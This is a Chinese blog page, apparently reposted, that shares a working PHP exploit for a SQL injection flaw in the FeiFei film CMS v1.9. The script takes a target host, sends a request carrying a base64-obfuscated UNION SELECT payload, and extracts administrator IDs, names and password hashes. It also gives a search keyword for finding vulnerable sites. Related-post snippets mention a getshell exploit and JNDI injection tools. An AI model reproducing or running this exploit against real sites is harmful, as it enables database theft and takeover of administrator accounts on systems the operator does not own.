飞飞php影视系统漏洞,飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料...

最新推荐文章于 2021-04-07 15:45:36 发布
最新推荐文章于 2021-04-07 15:45:36 发布
阅读量1.2k 收藏
点赞数
文章标签: 飞飞php影视系统漏洞

文章作者:honglousy

昨天整的 论坛旁站上的程序,发现用的人还真不少,

简单的写了个exp。无聊之作...

/**

*  飞飞影视管理系统 SQL injection

*  飞飞影视系统PHP版 v1.9 injection exploit

*  by:www.08sec.com fans

*     keyword "Powered bywww.ff84.com"

*/

error_reporting(E_ERROR);

set_time_limit(0);

if ($argc<3) {

print_r('

------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname),without"http://"

path: path to ff84cms

Example:

php '.$argv[0].' localhost /

-------------------------------------------------------

');

die;

}

$host=$argv[1];

$path=$argv[2];

$html='';

$cookie="";

$agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";

$content ="";

$data = "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

//$data .="Cookie: ".$cookie."\r\n";

$data .= "User-Agent: ".$agent. "\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Encoding: gzip,deflate\r\n";

$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

Sendpack($data);

if (!eregi("Tpl",$html)){

// echo $packet."\r\n";

// echo $html."\r\n";

die("Exploit failed...");

}else{

$pattern="/@(.*)@/i";

preg_match($pattern,$html,$pg);

echo "$pg[1]\r\n\r\n";

echo "\r\nExploit succeeded...\r\n";

}

Function sendpack ($packet)

{

global $host, $html;

$ock=fsockopen(gethostbyname($host),'80');

if (!$ock) {

echo 'No response from '.$host; die;

}

fputs($ock,$packet);

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}

weixin_39865102
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
飞飞php影视系统漏洞,飞飞影视最新前台无限制getshell
weixin_34421376的博客
03-28 1651
public function fetch($templateFile='',$charset='',$contentType='',$display=false){//die('errorcode');echo 'fetch';G('_viewStartTime');// 使用null参数作为模名直接返回不做任何输出if(null===$templateFile) return;// 网页字符...
飞飞影视php 漏洞,飞飞影视SQL injection exploit[转]
weixin_36288711的博客
04-04 3429
/***飞飞影视管理系统SQLinjection*飞飞影视系统PHPv1.9injectionexploit*by:www.08sec.comfans*keyword“Poweredbywww.ff84.com”*/error_reporting(E_ERROR);set_time_limit(0);if($argc<3){print_r(‘—————————...
飞飞php影视系统漏洞,feifeicms_v5.0.151112 飞飞影视系统PHP5.0升级了ThinkPHP内核2.1.1至3.2.2 修复了之前的全部漏洞, Web Server 266万源...
weixin_39830175的博客
03-10 1530
文件名称: feifeicms_v5.0.151112下载 收藏√ [5 4 3 2 1]开发工具: PHP文件大小: 3814 KB上传时间: 2016-10-14下载次数: 0提 供 者: liyao详细说明:飞飞影视系统PHP5.0升级了ThinkPHP内核2.1.1至3.2.2 修复了之前的全部漏洞,ThinkPHP3.2.2需要php5.3或更高本的支持,达不到环境请...
getvod.php_飞飞影视系统飞飞cms2.8标签大集合
weixin_30995917的博客
12-30 3308
************************视频(万能数据循环调用)标签************************************************解析范围:全站所有模板均可调用模板名称:所有模板调用函数: ff_mysql_vod(参数1:值1;参数2:值2;参数3,值3....;参数n,值n),支持的参数列表如下* 以下变量名如$vod_new可以自定义,只需确保唯一,...
飞飞影视系统php怎么进,飞飞影视系统PHPVOD搬家图文教程
weixin_36033884的博客
04-07 1288
相信有不少用飞飞影视系统做电影站的朋友吧,在电影站的发展过程中,可能会需要更换主机,这样,转移整个电影站就是相当重要的了。虽然飞飞官方论坛也有写搬家的步骤,不过比较简单,下面小编就分享下飞飞影视系统整站搬家的详细过程!(以PHPVOD1.9为例)第一步:原站备份数据库首先在搬家前要对要搬家的电影站进行数据库备份,进入数据维护—数据库备份,如下图:第二步:全站打包打包整站数据,在旧的空间控制面板中进...
飞飞影视导航系统 v4.0
10-07
飞飞影视导航系统(FeiFeiCms)是一套专为不同需求的而设计的视频点播、聚合导航系统,灵活,方便,采集快是最大的特色,为初学者快速架设网站首选,只需5分钟即可建立一个海
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞exploit工具包,本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
getExploit:从exploit-db.com下载漏洞利用程序
05-25
搜索漏洞search命令使您可以在原始exploit-db的CSV文件的任何字段中搜索给定的模式。 搜索查询必须采用field_name:pattern couples的形式,如果未给出字段名称,则默认为description 。 可用字段为: id内部漏洞利用...
最新飞飞影视源码
08-04
1. 将文件夹下所有的文件上传至您的网站空间 2. 如果您的主机为 window 操作系统,请将以下文件夹的IIS用户加上写入权限 3. 如果您的主机为 linux 操作系统,请设置如下文件夹权限为 777 ./Runtime/* 系统缓存目录 ./Uploads/* 系统附件保存目录 4. 通过浏览器访问 http://您的域名/install.php,根据提示填写 mysql 配置信息 5. 完成安装后会自动跳转到后台,默认用户名是admin 密码是admin888 6. 后台路径为http://您的域名/admin.php(强列建议将admin.php改一个不容易猜到的名字) 7. 如果您要使用飞飞影视导航系统建站,请保留官方站的友链链接与权信息! 8. 默认的伪静态规则(Apache,iis,nginx)都已经写好放在rewrite目录,只需要你的空间支持并将其移动到根目录即可! 演示站:www.aiguman.com www.tiandey.com
飞飞影视cms系统 v5.0 bulid20151112
10-23
飞飞影视系统PHP5.0升级了ThinkPHP内核2.1.1至3.2.2 修复了之前的全部漏洞,ThinkPHP3.2.2需要php5.3或更高本的支持,达不到环境请勿安装或升级。非常感谢您在众多的软件中选择了飞飞影视系统,祝您使用愉快,如需帮助请到论坛交流!飞飞影视系统 安装说明:1. 将文件夹下所有的文件上传至您的网站空间2.  如果您的主机为 window 操作系统,请将以下文件夹的IIS用户加上写入权限3. 如果您的主机为 linux 操作系统,请设置如下文件夹权限为 777    ./Runtime/* 系统缓存目录    ./Uploads/* 系统附件保存目录4. 通过浏览器访问 http//您的域名/admin.php(强列建议将admin.php改一个不容易猜到的名字)更多采集可在网上搜资源站,然后打上资源站提供的采集插件即可。注意:只打资源站提供的采集补丁,不要打播放器补丁,否则可能导致3个播放器同时支持有问题。注意1∶如果您要使用飞飞影视系统建站,请保留官方站的友链链接与权信息!注意2∶默认的伪静态规则(Apache,iis,nginx)都已经写好放在rew
飞飞PHP影视系统PPVOD v1.1beta4
03-26
程序名称:飞飞PHP影视系统(PPVOD) 程序本:1.0beta4 发布日期:2010-04-27 官方网站:www.ff84.com 安装环境:php5或更高本、mysql5或更高本 非常感谢您在众多的软件中选择了PPVOD,祝您使用愉快,如需帮助请到论坛交流! PPVOD安装说明 1. 将文件夹下所有的文件上传至您的网站空间 2. 如果您的主机为*nix操作系统,请设置如下文件夹权限为777 ./Conf ./Runtime ./Public/ads ./Upload ./Map ./Html 3.通过浏览器访问http://您的域名/install.php,根据提示填写mysql配置信息 4.完成安装后会自动跳转到后台,默认用户名是admin密码是admin888 5.后台路径为http://您的域名/admin.php
飞飞cms模板_最新仿热片
07-02
最新仿热片演示
飞飞影视导航系统官方 v4.2.191202
08-22
飞飞影视导航系统(FeiFeiCms)是一套专为不同需求的而设计的视频点播、聚合导航系统,灵活,方便,采集快是最大的特色,为初学者快速架设网站首选,只需5分钟即可建立一个海
实训指导5.1.5操作系统漏洞攻击MS06-040(精)PPT文档.pptx
11-14
操作系统漏洞攻击是网络安全领域中的一个重要话题,特别是在这个实训指导中,重点讨论了针对MS06-040漏洞的溢出攻击。MS06-040,也被称为“网络堆栈溢出漏洞”,是微软Windows操作系统中一个知名的漏洞,它主要影响...
飞飞php影视系统源码怎么改,飞飞cms影视系统安装说明 飞飞影视系统建站流程...
weixin_39609527的博客
03-18 1598
1. 将文件夹下所有的文件上传至您的网站空间2. 如果您的主机为 window 操作系统,请将以下文件夹的IIS用户加上写入权限3. 如果您的主机为 linux 操作系统,请设置如下文件夹权限为 777./Runtime/* 系统缓存目录./Uploads/* 系统附件保存目录4. 通过浏览器访问 http://您的域名/install.php,根据提示填写 mysql 配置信息5. 完成安装后会...
selenium.common.exceptions.WebDriverException: Message: unable to set
seTaire的博客
09-21 2170
本人使用的本是 python3.7 selenium3.14.1 macOS10.13.3 另外是在谷歌浏览器做的实验 下面看代码: 我想要添加一个name为MUSIC_U的cookie,运行后出现错误selenium.common.exceptions.WebDriverException: Message: unable to set  # -*- coding: ut...
www.akmwzjt.net/index.php,FuseQRCode/index.html at 0221cc7b6cdc5324c71e1e2f67df0e1c466577f0 · Liam02...
热门推荐
weixin_29317963的博客
03-23 38万+
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUYAAABuCAIAAADUPS1IAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAGwWSURBVHja7L1plJ3VdSZ...
jndi-injection-exploit-1.0-snapshot-all.jar
最新发布
03-16
jndi-injection-exploit-1.-snapshot-all.jar 是一个 Java 应用程序,用于测试和利用 JNDI 注入漏洞。JNDI 注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在目标系统上执行任意代码。该工具可以帮助安全研究...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值